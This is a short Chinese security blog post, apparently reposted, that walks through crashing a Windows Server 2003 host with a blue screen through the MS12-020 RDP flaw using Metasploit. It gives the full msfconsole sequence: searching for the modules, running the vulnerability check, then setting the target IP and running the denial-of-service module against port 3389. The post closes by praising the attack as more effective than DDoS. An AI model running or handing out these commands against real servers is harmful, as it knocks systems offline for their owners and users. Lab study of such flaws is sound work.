Metasploit之服务器蓝屏攻击

颓废 2019年5月19日10:18:10评论619 views字数 785阅读2分37秒阅读模式

Metasploit之服务器蓝屏攻击
参考文献:http://blog.csdn.net/strom2418/article/details/50392348
          http://www.metasploit.cn/thread-269-1-1.html

利用条件:受害者主机需要开启3389端口,漏洞是利用ms12_020

测试环境:
kali-linux: 192.168.2.146
Windows2003:192.168.2.107

首先还是打开metasploit

msfconsole

search ms12_020        -->搜索相关模块

返回信息给出两个模块:
auxiliary/scanner/rdp/ms12_020_check                -->漏洞的扫描检测模块

auxiliary/dos/windows/rdp/ms12_020_maxchannelids    -->漏洞的攻击利用模块

use auxiliary/scanner/rdp/ms12_020_check            -->使用漏洞检查模块

show options                  -->查看设置选项

set RHOSTS 192.168.2.107      -->设置受害者的IP地址,这里线程采用了默认

exploit                       -->执行检测

若检测存在,那么使用“use auxiliary/dos/windows/rdp/ms12_020_maxchannelids”,进入:
msf auxiliary(ms12_020_maxchannelids) > 

show options               -->查看设置选项

set RHOST 192.168.2.107    -->设置受害者的IP地址,端口是默认的3389

exploit                    -->执行蓝屏攻击

PS:这种攻击效果比DDOS来得更直接,更有效果。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:18:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之服务器蓝屏攻击http://cn-sec.com/archives/67388.html

发表评论

匿名网友 填写信息